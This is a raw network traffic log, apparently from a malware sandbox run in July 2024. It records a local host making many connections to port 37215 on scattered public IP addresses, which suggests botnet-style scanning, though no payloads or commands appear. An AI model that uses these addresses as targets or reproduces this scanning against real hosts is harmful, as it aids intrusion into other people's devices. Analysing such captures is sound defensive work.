                                                    Jul 10, 2024 08:26:13.776397943 CEST3776637215192.168.2.14187.145.136.229
                                                    Jul 10, 2024 08:26:13.776397943 CEST4331437215192.168.2.14113.87.153.122
                                                    Jul 10, 2024 08:26:13.776560068 CEST372155170241.87.240.138192.168.2.14
                                                    Jul 10, 2024 08:26:13.776638031 CEST3721534292157.87.82.194192.168.2.14
                                                    Jul 10, 2024 08:26:13.776700974 CEST5253037215192.168.2.14197.161.19.40
                                                    Jul 10, 2024 08:26:13.776700974 CEST4282437215192.168.2.14197.147.101.74
                                                    Jul 10, 2024 08:26:13.776700974 CEST3672437215192.168.2.1441.111.125.2
                                                    Jul 10, 2024 08:26:13.776748896 CEST372154605873.41.204.150192.168.2.14
                                                    Jul 10, 2024 08:26:13.776844025 CEST3721554974197.33.215.163192.168.2.14
                                                    Jul 10, 2024 08:26:13.776890039 CEST372154605873.41.204.150192.168.2.14
                                                    Jul 10, 2024 08:26:13.777095079 CEST372154003041.228.77.48192.168.2.14
                                                    Jul 10, 2024 08:26:13.777100086 CEST3721551620197.45.160.10192.168.2.14
                                                    Jul 10, 2024 08:26:13.777195930 CEST3721543644197.215.171.127192.168.2.14
                                                    Jul 10, 2024 08:26:13.777205944 CEST3721545580157.174.22.21192.168.2.14
                                                    Jul 10, 2024 08:26:13.777209997 CEST3721554342157.16.75.176192.168.2.14
                                                    Jul 10, 2024 08:26:13.777445078 CEST3721551412197.241.238.101192.168.2.14
                                                    Jul 10, 2024 08:26:13.777450085 CEST3721542010147.148.215.139192.168.2.14
                                                    Jul 10, 2024 08:26:13.777453899 CEST3721543644197.215.171.127192.168.2.14
                                                    Jul 10, 2024 08:26:13.777997017 CEST3721554974197.33.215.163192.168.2.14
                                                    Jul 10, 2024 08:26:13.778001070 CEST3721543506157.17.22.189192.168.2.14
                                                    Jul 10, 2024 08:26:13.778004885 CEST372154322441.152.177.189192.168.2.14
                                                    Jul 10, 2024 08:26:13.778156996 CEST4302237215192.168.2.1441.45.230.71
                                                    Jul 10, 2024 08:26:13.778156996 CEST3349037215192.168.2.14218.144.238.52
                                                    Jul 10, 2024 08:26:13.778156996 CEST5861237215192.168.2.1441.192.102.16
                                                    Jul 10, 2024 08:26:13.778156996 CEST5612037215192.168.2.1438.1.173.153
                                                    Jul 10, 2024 08:26:13.778156996 CEST3757037215192.168.2.14197.204.104.14
                                                    Jul 10, 2024 08:26:13.778156996 CEST5170237215192.168.2.1441.87.240.138
                                                    Jul 10, 2024 08:26:13.778156996 CEST5162037215192.168.2.14197.45.160.10
                                                    Jul 10, 2024 08:26:13.778156996 CEST5209037215192.168.2.14157.43.50.8
                                                    Jul 10, 2024 08:26:13.778167009 CEST3721534588157.37.60.52192.168.2.14
                                                    Jul 10, 2024 08:26:13.778172016 CEST3721543644197.215.171.127192.168.2.14
                                                    Jul 10, 2024 08:26:13.778176069 CEST372153470458.216.141.54192.168.2.14
                                                    Jul 10, 2024 08:26:13.778384924 CEST372154031041.136.152.112192.168.2.14
                                                    Jul 10, 2024 08:26:13.778580904 CEST3721552576197.126.237.60192.168.2.14
                                                    Jul 10, 2024 08:26:13.778585911 CEST372155257641.156.25.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.778609991 CEST4708337215192.168.2.14157.97.135.42
                                                    Jul 10, 2024 08:26:13.778609991 CEST4708337215192.168.2.1441.97.247.254
                                                    Jul 10, 2024 08:26:13.778609991 CEST4035237215192.168.2.14157.239.140.222
                                                    Jul 10, 2024 08:26:13.778609991 CEST4708337215192.168.2.14157.75.247.179
                                                    Jul 10, 2024 08:26:13.778610945 CEST3616037215192.168.2.1441.2.245.226
                                                    Jul 10, 2024 08:26:13.778691053 CEST3721546954157.199.168.111192.168.2.14
                                                    Jul 10, 2024 08:26:13.778744936 CEST5797037215192.168.2.1441.156.136.103
                                                    Jul 10, 2024 08:26:13.778744936 CEST5315037215192.168.2.1441.125.96.130
                                                    Jul 10, 2024 08:26:13.778927088 CEST3944037215192.168.2.14157.116.198.66
                                                    Jul 10, 2024 08:26:13.778927088 CEST5064437215192.168.2.1491.77.13.177
                                                    Jul 10, 2024 08:26:13.778927088 CEST5064437215192.168.2.1491.77.13.177
                                                    Jul 10, 2024 08:26:13.778927088 CEST5146437215192.168.2.14157.82.104.201
                                                    Jul 10, 2024 08:26:13.778928041 CEST4695437215192.168.2.14157.199.168.111
                                                    Jul 10, 2024 08:26:13.778928041 CEST5178037215192.168.2.1441.11.106.64
                                                    Jul 10, 2024 08:26:13.778928041 CEST5064437215192.168.2.1491.77.13.177
                                                    Jul 10, 2024 08:26:13.778928041 CEST5146437215192.168.2.14157.82.104.201
                                                    Jul 10, 2024 08:26:13.779113054 CEST3721545580157.174.22.21192.168.2.14
                                                    Jul 10, 2024 08:26:13.779207945 CEST372156099841.64.116.206192.168.2.14
                                                    Jul 10, 2024 08:26:13.779211998 CEST3721534292157.87.82.194192.168.2.14
                                                    Jul 10, 2024 08:26:13.779578924 CEST3721559732217.238.155.130192.168.2.14
                                                    Jul 10, 2024 08:26:13.779583931 CEST372154684441.132.43.2192.168.2.14
                                                    Jul 10, 2024 08:26:13.779687881 CEST4562437215192.168.2.1441.84.105.26
                                                    Jul 10, 2024 08:26:13.779687881 CEST5465637215192.168.2.1441.95.26.48
                                                    Jul 10, 2024 08:26:13.779687881 CEST5537837215192.168.2.14197.230.151.250
                                                    Jul 10, 2024 08:26:13.779687881 CEST5537837215192.168.2.14197.230.151.250
                                                    Jul 10, 2024 08:26:13.779687881 CEST5537837215192.168.2.14197.230.151.250
                                                    Jul 10, 2024 08:26:13.779687881 CEST4364437215192.168.2.14197.215.171.127
                                                    Jul 10, 2024 08:26:13.779687881 CEST5257637215192.168.2.1441.156.25.221
                                                    Jul 10, 2024 08:26:13.779687881 CEST5257637215192.168.2.1441.156.25.221
                                                    Jul 10, 2024 08:26:13.780000925 CEST3721533768157.120.162.132192.168.2.14
                                                    Jul 10, 2024 08:26:13.780010939 CEST3721553526157.161.249.250192.168.2.14
                                                    Jul 10, 2024 08:26:13.780165911 CEST372154743841.240.232.222192.168.2.14
                                                    Jul 10, 2024 08:26:13.780170918 CEST3721549156157.101.32.85192.168.2.14
                                                    Jul 10, 2024 08:26:13.780431986 CEST3721551464157.82.104.201192.168.2.14
                                                    Jul 10, 2024 08:26:13.780632973 CEST3721537212157.133.113.199192.168.2.14
                                                    Jul 10, 2024 08:26:13.780678034 CEST3430437215192.168.2.1438.16.177.91
                                                    Jul 10, 2024 08:26:13.780678034 CEST5387237215192.168.2.14191.77.251.99
                                                    Jul 10, 2024 08:26:13.780678034 CEST4016637215192.168.2.14157.27.79.255
                                                    Jul 10, 2024 08:26:13.780678034 CEST4293437215192.168.2.14197.175.14.150
                                                    Jul 10, 2024 08:26:13.780678034 CEST5797037215192.168.2.1441.156.136.103
                                                    Jul 10, 2024 08:26:13.780678034 CEST5315037215192.168.2.1441.125.96.130
                                                    Jul 10, 2024 08:26:13.780678034 CEST3430437215192.168.2.1438.16.177.91
                                                    Jul 10, 2024 08:26:13.780706882 CEST3721549156157.101.32.85192.168.2.14
                                                    Jul 10, 2024 08:26:13.780711889 CEST3721538902157.71.211.82192.168.2.14
                                                    Jul 10, 2024 08:26:13.780764103 CEST3721540240180.134.121.249192.168.2.14
                                                    Jul 10, 2024 08:26:13.780915022 CEST4915637215192.168.2.14157.101.32.85
                                                    Jul 10, 2024 08:26:13.780972004 CEST3721537766187.145.136.229192.168.2.14
                                                    Jul 10, 2024 08:26:13.781116009 CEST372153430438.16.177.91192.168.2.14
                                                    Jul 10, 2024 08:26:13.781121016 CEST3721535432197.95.228.157192.168.2.14
                                                    Jul 10, 2024 08:26:13.781352997 CEST3721553872191.77.251.99192.168.2.14
                                                    Jul 10, 2024 08:26:13.781475067 CEST3721544570197.66.186.228192.168.2.14
                                                    Jul 10, 2024 08:26:13.781481028 CEST3721543314113.87.153.122192.168.2.14
                                                    Jul 10, 2024 08:26:13.781543016 CEST5996037215192.168.2.14197.28.157.243
                                                    Jul 10, 2024 08:26:13.781543016 CEST4870437215192.168.2.1441.216.165.13
                                                    Jul 10, 2024 08:26:13.781543016 CEST5814237215192.168.2.1441.120.237.207
                                                    Jul 10, 2024 08:26:13.781543016 CEST3776637215192.168.2.14187.145.136.229
                                                    Jul 10, 2024 08:26:13.781543016 CEST5383837215192.168.2.1441.58.113.10
                                                    Jul 10, 2024 08:26:13.781543016 CEST3389837215192.168.2.1441.16.86.76
                                                    Jul 10, 2024 08:26:13.781543016 CEST4331437215192.168.2.14113.87.153.122
                                                    Jul 10, 2024 08:26:13.781543016 CEST3280837215192.168.2.14197.36.209.238
                                                    Jul 10, 2024 08:26:13.781861067 CEST3721551070223.169.203.255192.168.2.14
                                                    Jul 10, 2024 08:26:13.781867027 CEST3721559960197.28.157.243192.168.2.14
                                                    Jul 10, 2024 08:26:13.782145023 CEST372155814241.120.237.207192.168.2.14
                                                    Jul 10, 2024 08:26:13.782351971 CEST372155885841.53.146.130192.168.2.14
                                                    Jul 10, 2024 08:26:13.782361984 CEST3721552530197.161.19.40192.168.2.14
                                                    Jul 10, 2024 08:26:13.782563925 CEST3721549156157.101.32.85192.168.2.14
                                                    Jul 10, 2024 08:26:13.782568932 CEST3721537212157.133.113.199192.168.2.14
                                                    Jul 10, 2024 08:26:13.782651901 CEST372154806441.100.42.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.782807112 CEST4708337215192.168.2.1441.186.10.191
                                                    Jul 10, 2024 08:26:13.782807112 CEST4708337215192.168.2.14157.70.113.130
                                                    Jul 10, 2024 08:26:13.782807112 CEST4708337215192.168.2.1478.4.27.46
                                                    Jul 10, 2024 08:26:13.782807112 CEST4605837215192.168.2.1473.41.204.150
                                                    Jul 10, 2024 08:26:13.782807112 CEST4322437215192.168.2.1441.152.177.189
                                                    Jul 10, 2024 08:26:13.782807112 CEST3458837215192.168.2.14157.37.60.52
                                                    Jul 10, 2024 08:26:13.782807112 CEST4805837215192.168.2.1441.178.8.111
                                                    Jul 10, 2024 08:26:13.782807112 CEST5407037215192.168.2.14197.153.14.104
                                                    Jul 10, 2024 08:26:13.782830954 CEST4806437215192.168.2.1441.100.42.16
                                                    Jul 10, 2024 08:26:13.782834053 CEST3721537212157.133.113.199192.168.2.14
                                                    Jul 10, 2024 08:26:13.782830954 CEST4806437215192.168.2.1441.100.42.16
                                                    Jul 10, 2024 08:26:13.782830954 CEST4806437215192.168.2.1441.100.42.16
                                                    Jul 10, 2024 08:26:13.783041954 CEST372153672441.111.125.2192.168.2.14
                                                    Jul 10, 2024 08:26:13.783046961 CEST372155178041.11.106.64192.168.2.14
                                                    Jul 10, 2024 08:26:13.783083916 CEST4708337215192.168.2.14163.153.43.41
                                                    Jul 10, 2024 08:26:13.783083916 CEST4708337215192.168.2.14157.118.229.105
                                                    Jul 10, 2024 08:26:13.783083916 CEST4708337215192.168.2.14157.201.16.191
                                                    Jul 10, 2024 08:26:13.783083916 CEST3457037215192.168.2.14197.237.24.115
                                                    Jul 10, 2024 08:26:13.783083916 CEST5471837215192.168.2.1441.197.135.27
                                                    Jul 10, 2024 08:26:13.783083916 CEST4708337215192.168.2.1441.170.228.135
                                                    Jul 10, 2024 08:26:13.783083916 CEST4708337215192.168.2.1441.161.144.152
                                                    Jul 10, 2024 08:26:13.783085108 CEST5449037215192.168.2.14102.43.49.175
                                                    Jul 10, 2024 08:26:13.783385992 CEST3721536786142.36.169.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.783616066 CEST372154870441.216.165.13192.168.2.14
                                                    Jul 10, 2024 08:26:13.783620119 CEST3721542824197.147.101.74192.168.2.14
                                                    Jul 10, 2024 08:26:13.783624887 CEST372154302241.45.230.71192.168.2.14
                                                    Jul 10, 2024 08:26:13.783632040 CEST3721540166157.27.79.255192.168.2.14
                                                    Jul 10, 2024 08:26:13.783787966 CEST4695437215192.168.2.14157.199.168.111
                                                    Jul 10, 2024 08:26:13.783787966 CEST5178037215192.168.2.1441.11.106.64
                                                    Jul 10, 2024 08:26:13.783787966 CEST3355037215192.168.2.1441.136.250.104
                                                    Jul 10, 2024 08:26:13.783787966 CEST5080837215192.168.2.1476.178.176.183
                                                    Jul 10, 2024 08:26:13.783787966 CEST5058837215192.168.2.14157.161.174.38
                                                    Jul 10, 2024 08:26:13.783787966 CEST5519037215192.168.2.1452.42.76.224
                                                    Jul 10, 2024 08:26:13.783787966 CEST5832037215192.168.2.14157.74.13.114
                                                    Jul 10, 2024 08:26:13.783787966 CEST5832037215192.168.2.14157.74.13.114
                                                    Jul 10, 2024 08:26:13.783983946 CEST3721542934197.175.14.150192.168.2.14
                                                    Jul 10, 2024 08:26:13.783997059 CEST3721556566197.103.201.75192.168.2.14
                                                    Jul 10, 2024 08:26:13.784002066 CEST3721535220157.59.253.208192.168.2.14
                                                    Jul 10, 2024 08:26:13.784133911 CEST3721539440157.116.198.66192.168.2.14
                                                    Jul 10, 2024 08:26:13.784339905 CEST3721559282197.111.106.252192.168.2.14
                                                    Jul 10, 2024 08:26:13.784538984 CEST372155797041.156.136.103192.168.2.14
                                                    Jul 10, 2024 08:26:13.784822941 CEST3721543964157.204.28.132192.168.2.14
                                                    Jul 10, 2024 08:26:13.784826994 CEST372154870441.216.165.13192.168.2.14
                                                    Jul 10, 2024 08:26:13.784917116 CEST3721533490218.144.238.52192.168.2.14
                                                    Jul 10, 2024 08:26:13.785070896 CEST5257637215192.168.2.1441.156.25.221
                                                    Jul 10, 2024 08:26:13.785070896 CEST3721237215192.168.2.14157.133.113.199
                                                    Jul 10, 2024 08:26:13.785070896 CEST3678637215192.168.2.14142.36.169.221
                                                    Jul 10, 2024 08:26:13.785070896 CEST3678637215192.168.2.14142.36.169.221
                                                    Jul 10, 2024 08:26:13.785070896 CEST3678637215192.168.2.14142.36.169.221
                                                    Jul 10, 2024 08:26:13.785070896 CEST5928237215192.168.2.14197.111.106.252
                                                    Jul 10, 2024 08:26:13.785070896 CEST5928237215192.168.2.14197.111.106.252
                                                    Jul 10, 2024 08:26:13.785157919 CEST372154562441.84.105.26192.168.2.14
                                                    Jul 10, 2024 08:26:13.785161972 CEST3721534692157.0.207.158192.168.2.14
                                                    Jul 10, 2024 08:26:13.785326004 CEST372155861241.192.102.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.785331011 CEST372155064491.77.13.177192.168.2.14
                                                    Jul 10, 2024 08:26:13.785458088 CEST372155814241.120.237.207192.168.2.14
                                                    Jul 10, 2024 08:26:13.785466909 CEST372155315041.125.96.130192.168.2.14
                                                    Jul 10, 2024 08:26:13.785554886 CEST372155465641.95.26.48192.168.2.14
                                                    Jul 10, 2024 08:26:13.785999060 CEST372154003041.228.77.48192.168.2.14
                                                    Jul 10, 2024 08:26:13.786004066 CEST3721540352157.239.140.222192.168.2.14
                                                    Jul 10, 2024 08:26:13.786335945 CEST3721537766187.145.136.229192.168.2.14
                                                    Jul 10, 2024 08:26:13.786339998 CEST3721549156157.101.32.85192.168.2.14
                                                    Jul 10, 2024 08:26:13.786345005 CEST3721555378197.230.151.250192.168.2.14
                                                    Jul 10, 2024 08:26:13.786936045 CEST3721543314113.87.153.122192.168.2.14
                                                    Jul 10, 2024 08:26:13.786941051 CEST372153430438.16.177.91192.168.2.14
                                                    Jul 10, 2024 08:26:13.786945105 CEST3721559960197.28.157.243192.168.2.14
                                                    Jul 10, 2024 08:26:13.787066936 CEST4031037215192.168.2.1441.136.152.112
                                                    Jul 10, 2024 08:26:13.787066936 CEST3376837215192.168.2.14157.120.162.132
                                                    Jul 10, 2024 08:26:13.787066936 CEST3890237215192.168.2.14157.71.211.82
                                                    Jul 10, 2024 08:26:13.787066936 CEST5107037215192.168.2.14223.169.203.255
                                                    Jul 10, 2024 08:26:13.787066936 CEST5253037215192.168.2.14197.161.19.40
                                                    Jul 10, 2024 08:26:13.787066936 CEST4282437215192.168.2.14197.147.101.74
                                                    Jul 10, 2024 08:26:13.787066936 CEST4024037215192.168.2.14180.134.121.249
                                                    Jul 10, 2024 08:26:13.787066936 CEST3672437215192.168.2.1441.111.125.2
                                                    Jul 10, 2024 08:26:13.787075043 CEST3721553872191.77.251.99192.168.2.14
                                                    Jul 10, 2024 08:26:13.787094116 CEST372155064491.77.13.177192.168.2.14
                                                    Jul 10, 2024 08:26:13.787098885 CEST372154870441.216.165.13192.168.2.14
                                                    Jul 10, 2024 08:26:13.787427902 CEST3721551464157.82.104.201192.168.2.14
                                                    Jul 10, 2024 08:26:13.787533998 CEST3721555378197.230.151.250192.168.2.14
                                                    Jul 10, 2024 08:26:13.787779093 CEST3721546954157.199.168.111192.168.2.14
                                                    Jul 10, 2024 08:26:13.788070917 CEST5832037215192.168.2.14157.74.13.114
                                                    Jul 10, 2024 08:26:13.788070917 CEST5232437215192.168.2.1441.217.110.52
                                                    Jul 10, 2024 08:26:13.788070917 CEST5232437215192.168.2.1441.217.110.52
                                                    Jul 10, 2024 08:26:13.788070917 CEST5232437215192.168.2.1441.217.110.52
                                                    Jul 10, 2024 08:26:13.788070917 CEST5554437215192.168.2.14199.60.70.205
                                                    Jul 10, 2024 08:26:13.788070917 CEST3574237215192.168.2.14197.103.234.199
                                                    Jul 10, 2024 08:26:13.788070917 CEST4695437215192.168.2.14157.199.168.111
                                                    Jul 10, 2024 08:26:13.788070917 CEST5146437215192.168.2.14157.82.104.201
                                                    Jul 10, 2024 08:26:13.788130045 CEST372153616041.2.245.226192.168.2.14
                                                    Jul 10, 2024 08:26:13.788135052 CEST372155612038.1.173.153192.168.2.14
                                                    Jul 10, 2024 08:26:13.788311958 CEST4708337215192.168.2.14157.211.27.196
                                                    Jul 10, 2024 08:26:13.788311958 CEST5930437215192.168.2.14157.101.103.193
                                                    Jul 10, 2024 08:26:13.788311958 CEST4563237215192.168.2.14197.143.8.81
                                                    Jul 10, 2024 08:26:13.788469076 CEST372155178041.11.106.64192.168.2.14
                                                    Jul 10, 2024 08:26:13.788474083 CEST372155064491.77.13.177192.168.2.14
                                                    Jul 10, 2024 08:26:13.788754940 CEST372154806441.100.42.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.788759947 CEST372154806441.100.42.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.788845062 CEST3721555378197.230.151.250192.168.2.14
                                                    Jul 10, 2024 08:26:13.788849115 CEST3721551464157.82.104.201192.168.2.14
                                                    Jul 10, 2024 08:26:13.788853884 CEST3721543644197.215.171.127192.168.2.14
                                                    Jul 10, 2024 08:26:13.789096117 CEST372155814241.120.237.207192.168.2.14
                                                    Jul 10, 2024 08:26:13.789442062 CEST372154806441.100.42.16192.168.2.14
                                                    Jul 10, 2024 08:26:13.789531946 CEST5387237215192.168.2.14191.77.251.99
                                                    Jul 10, 2024 08:26:13.789532900 CEST4016637215192.168.2.14157.27.79.255
                                                    Jul 10, 2024 08:26:13.789532900 CEST3542637215192.168.2.1441.218.142.246
                                                    Jul 10, 2024 08:26:13.789532900 CEST4293437215192.168.2.14197.175.14.150
                                                    Jul 10, 2024 08:26:13.789532900 CEST5797037215192.168.2.1441.156.136.103
                                                    Jul 10, 2024 08:26:13.789532900 CEST5315037215192.168.2.1441.125.96.130
                                                    Jul 10, 2024 08:26:13.789532900 CEST4138637215192.168.2.1441.188.229.131
                                                    Jul 10, 2024 08:26:13.789532900 CEST5082837215192.168.2.14157.20.222.218
                                                    Jul 10, 2024 08:26:13.789638042 CEST3721537766187.145.136.229192.168.2.14
                                                    Jul 10, 2024 08:26:13.789642096 CEST372154605873.41.204.150192.168.2.14
                                                    Jul 10, 2024 08:26:13.790019035 CEST372155257641.156.25.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.790024042 CEST3721537570197.204.104.14192.168.2.14
                                                    Jul 10, 2024 08:26:13.790097952 CEST3721546954157.199.168.111192.168.2.14
                                                    Jul 10, 2024 08:26:13.790107012 CEST372155257641.156.25.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.790111065 CEST372155178041.11.106.64192.168.2.14
                                                    Jul 10, 2024 08:26:13.790123940 CEST5928237215192.168.2.14197.111.106.252
                                                    Jul 10, 2024 08:26:13.790123940 CEST5537837215192.168.2.14197.230.151.250
                                                    Jul 10, 2024 08:26:13.790246964 CEST372155170241.87.240.138192.168.2.14
                                                    Jul 10, 2024 08:26:13.790338039 CEST372155257641.156.25.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.790344000 CEST372153355041.136.250.104192.168.2.14
                                                    Jul 10, 2024 08:26:13.790493011 CEST4212837215192.168.2.14157.160.107.146
                                                    Jul 10, 2024 08:26:13.790493011 CEST5996037215192.168.2.14197.28.157.243
                                                    Jul 10, 2024 08:26:13.790493011 CEST5594637215192.168.2.1495.231.59.84
                                                    Jul 10, 2024 08:26:13.790493011 CEST6008437215192.168.2.14157.20.113.153
                                                    Jul 10, 2024 08:26:13.790493011 CEST3280837215192.168.2.14197.36.209.238
                                                    Jul 10, 2024 08:26:13.790493011 CEST5383837215192.168.2.1441.58.113.10
                                                    Jul 10, 2024 08:26:13.790493011 CEST3389837215192.168.2.1441.16.86.76
                                                    Jul 10, 2024 08:26:13.790493011 CEST4212837215192.168.2.14157.160.107.146
                                                    Jul 10, 2024 08:26:13.790733099 CEST4708337215192.168.2.1473.131.82.153
                                                    Jul 10, 2024 08:26:13.790733099 CEST4708337215192.168.2.14157.75.227.205
                                                    Jul 10, 2024 08:26:13.790733099 CEST4708337215192.168.2.14191.158.14.198
                                                    Jul 10, 2024 08:26:13.790733099 CEST4708337215192.168.2.1441.135.244.163
                                                    Jul 10, 2024 08:26:13.790733099 CEST4708337215192.168.2.14135.245.254.186
                                                    Jul 10, 2024 08:26:13.790904999 CEST3721540166157.27.79.255192.168.2.14
                                                    Jul 10, 2024 08:26:13.790910006 CEST372155383841.58.113.10192.168.2.14
                                                    Jul 10, 2024 08:26:13.791378021 CEST372154322441.152.177.189192.168.2.14
                                                    Jul 10, 2024 08:26:13.791383028 CEST3721537212157.133.113.199192.168.2.14
                                                    Jul 10, 2024 08:26:13.791387081 CEST3721536768197.91.209.27192.168.2.14
                                                    Jul 10, 2024 08:26:13.791764021 CEST3721534588157.37.60.52192.168.2.14
                                                    Jul 10, 2024 08:26:13.791769028 CEST372155080876.178.176.183192.168.2.14
                                                    Jul 10, 2024 08:26:13.792072058 CEST3721536786142.36.169.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.792076111 CEST3721551620197.45.160.10192.168.2.14
                                                    Jul 10, 2024 08:26:13.792081118 CEST3721550588157.161.174.38192.168.2.14
                                                    Jul 10, 2024 08:26:13.792216063 CEST5257637215192.168.2.1441.156.25.221
                                                    Jul 10, 2024 08:26:13.792216063 CEST3678637215192.168.2.14142.36.169.221
                                                    Jul 10, 2024 08:26:13.792222023 CEST3721552090157.43.50.8192.168.2.14
                                                    Jul 10, 2024 08:26:13.792227030 CEST372155519052.42.76.224192.168.2.14
                                                    Jul 10, 2024 08:26:13.792833090 CEST372153389841.16.86.76192.168.2.14
                                                    Jul 10, 2024 08:26:13.792839050 CEST372154805841.178.8.111192.168.2.14
                                                    Jul 10, 2024 08:26:13.792843103 CEST372154031041.136.152.112192.168.2.14
                                                    Jul 10, 2024 08:26:13.792853117 CEST3721542934197.175.14.150192.168.2.14
                                                    Jul 10, 2024 08:26:13.792857885 CEST3721558320157.74.13.114192.168.2.14
                                                    Jul 10, 2024 08:26:13.793029070 CEST3721543314113.87.153.122192.168.2.14
                                                    Jul 10, 2024 08:26:13.793034077 CEST372155797041.156.136.103192.168.2.14
                                                    Jul 10, 2024 08:26:13.793036938 CEST3721558320157.74.13.114192.168.2.14
                                                    Jul 10, 2024 08:26:13.793257952 CEST3721533768157.120.162.132192.168.2.14
                                                    Jul 10, 2024 08:26:13.793262959 CEST3721554070197.153.14.104192.168.2.14
                                                    Jul 10, 2024 08:26:13.793462038 CEST4302237215192.168.2.1441.45.230.71
                                                    Jul 10, 2024 08:26:13.793462038 CEST3349037215192.168.2.14218.144.238.52
                                                    Jul 10, 2024 08:26:13.793462038 CEST5861237215192.168.2.1441.192.102.16
                                                    Jul 10, 2024 08:26:13.793462038 CEST5612037215192.168.2.1438.1.173.153
                                                    Jul 10, 2024 08:26:13.793462038 CEST3757037215192.168.2.14197.204.104.14
                                                    Jul 10, 2024 08:26:13.793462038 CEST4067837215192.168.2.14157.90.123.92
                                                    Jul 10, 2024 08:26:13.793462038 CEST5170237215192.168.2.1441.87.240.138
                                                    Jul 10, 2024 08:26:13.793462038 CEST5162037215192.168.2.14197.45.160.10
                                                    Jul 10, 2024 08:26:13.793709993 CEST3721558320157.74.13.114192.168.2.14
                                                    Jul 10, 2024 08:26:13.793874025 CEST3721536786142.36.169.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.793879032 CEST3721538902157.71.211.82192.168.2.14
                                                    Jul 10, 2024 08:26:13.794136047 CEST3721551070223.169.203.255192.168.2.14
                                                    Jul 10, 2024 08:26:13.794137955 CEST4708337215192.168.2.1441.1.100.147
                                                    Jul 10, 2024 08:26:13.794146061 CEST372155315041.125.96.130192.168.2.14
                                                    Jul 10, 2024 08:26:13.794152021 CEST372155232441.217.110.52192.168.2.14
                                                    Jul 10, 2024 08:26:13.794547081 CEST3442237215192.168.2.14157.239.242.139
                                                    Jul 10, 2024 08:26:13.794547081 CEST5733637215192.168.2.14223.189.137.228
                                                    Jul 10, 2024 08:26:13.794547081 CEST4171637215192.168.2.1451.98.106.225
                                                    Jul 10, 2024 08:26:13.794547081 CEST5257837215192.168.2.14131.76.42.65
                                                    Jul 10, 2024 08:26:13.794547081 CEST4101037215192.168.2.1441.60.51.46
                                                    Jul 10, 2024 08:26:13.794548035 CEST5760437215192.168.2.1441.4.170.250
                                                    Jul 10, 2024 08:26:13.794548035 CEST3442237215192.168.2.14157.239.242.139
                                                    Jul 10, 2024 08:26:13.794684887 CEST5178037215192.168.2.1441.11.106.64
                                                    Jul 10, 2024 08:26:13.794684887 CEST5064437215192.168.2.1491.77.13.177
                                                    Jul 10, 2024 08:26:13.794684887 CEST3355037215192.168.2.1441.136.250.104
                                                    Jul 10, 2024 08:26:13.794684887 CEST3355037215192.168.2.1441.136.250.104
                                                    Jul 10, 2024 08:26:13.794686079 CEST3355037215192.168.2.1441.136.250.104
                                                    Jul 10, 2024 08:26:13.794686079 CEST5519037215192.168.2.1452.42.76.224
                                                    Jul 10, 2024 08:26:13.794686079 CEST5832037215192.168.2.14157.74.13.114
                                                    Jul 10, 2024 08:26:13.794686079 CEST5519037215192.168.2.1452.42.76.224
                                                    Jul 10, 2024 08:26:13.794689894 CEST3721559304157.101.103.193192.168.2.14
                                                    Jul 10, 2024 08:26:13.794694901 CEST3721536786142.36.169.221192.168.2.14
                                                    Jul 10, 2024 08:26:13.794825077 CEST4708337215192.168.2.1481.125.168.67
                                                    Jul 10, 2024 08:26:13.794825077 CEST4708337215192.168.2.14197.118.185.20
                                                    Jul 10, 2024 08:26:13.795124054 CEST372153430438.16.177.91192.168.2.14
                                                    Jul 10, 2024 08:26:13.795134068 CEST372155232441.217.110.52192.168.2.14
                                                    Jul 10, 2024 08:26:13.795139074 CEST3721545632197.143.8.81192.168.2.14
                                                    Jul 10, 2024 08:26:13.795205116 CEST3721559282197.111.106.252192.168.2.14
                                                    Jul 10, 2024 08:26:13.795211077 CEST372155232441.217.110.52192.168.2.14
                                                    Jul 10, 2024 08:26:13.795209885 CEST3412437215192.168.2.1441.184.171.245
                                                    Jul 10, 2024 08:26:13.795209885 CEST4639237215192.168.2.14157.6.170.133
                                                    Jul 10, 2024 08:26:13.795209885 CEST5204037215192.168.2.1441.15.227.169
                                                    Jul 10, 2024 08:26:13.795209885 CEST5866037215192.168.2.14197.26.192.254
                                                    Jul 10, 2024 08:26:13.795209885 CEST3542637215192.168.2.1441.218.142.246
                                                    Jul 10, 2024 08:26:13.795209885 CEST3542637215192.168.2.1441.218.142.246
                                                    Jul 10, 2024 08:26:13.795216084 CEST3721559282197.111.106.252192.168.2.14
                                                    Jul 10, 2024 08:26:13.795278072 CEST3280837215192.168.2.14197.36.209.238
                                                    Jul 10, 2024 08:26:13.795278072 CEST5383837215192.168.2.1441.58.113.10
                                                    Jul 10, 2024 08:26:13.795278072 CEST3389837215192.168.2.1441.16.86.76
                                                    Jul 10, 2024 08:26:13.795278072 CEST4212837215192.168.2.14157.160.107.146
                                                    Jul 10, 2024 08:26:13.795279026 CEST3443837215192.168.2.1441.45.132.242
                                                    Jul 10, 2024 08:26:13.795279026 CEST5824237215192.168.2.14171.173.231.244
                                                    Jul 10, 2024 08:26:13.795586109 CEST4708337215192.168.2.14157.231.117.203
                                                    Jul 10, 2024 08:26:13.795778036 CEST3721534570197.237.24.115192.168.2.14
                                                    Jul 10, 2024 08:26:13.795783997 CEST3721553872191.77.251.99192.168.2.14
                                                    Jul 10, 2024 08:26:13.795789003 CEST3721532808197.36.209.238192.168.2.14
                                                    Jul 10, 2024 08:26:13.796124935 CEST4708337215192.168.2.14157.138.214.233
                                                    Jul 10, 2024 08:26:13.796138048 CEST3721552530197.161.19.40192.168.2.14
                                                    Jul 10, 2024 08:26:13.796143055 CEST3721542128157.160.107.146192.168.2.14
                                                    Jul 10, 2024 08:26:13.796456099 CEST3721559960197.28.157.243192.168.2.14
                                                    Jul 10, 2024 08:26:13.796461105 CEST3721559282197.111.106.252192.168.2.14
                                                    Jul 10, 2024 08:26:13.796464920 CEST3721542824197.147.101.74192.168.2.14
                                                    Jul 10, 2024 08:26:13.796686888 CEST372155594695.231.59.84192.168.2.14
                                                    Jul 10, 2024 08:26:13.796693087 CEST372155471841.197.135.27192.168.2.14
                                                    Jul 10, 2024 08:26:13.796698093 CEST3721560084157.20.113.153192.168.2.14
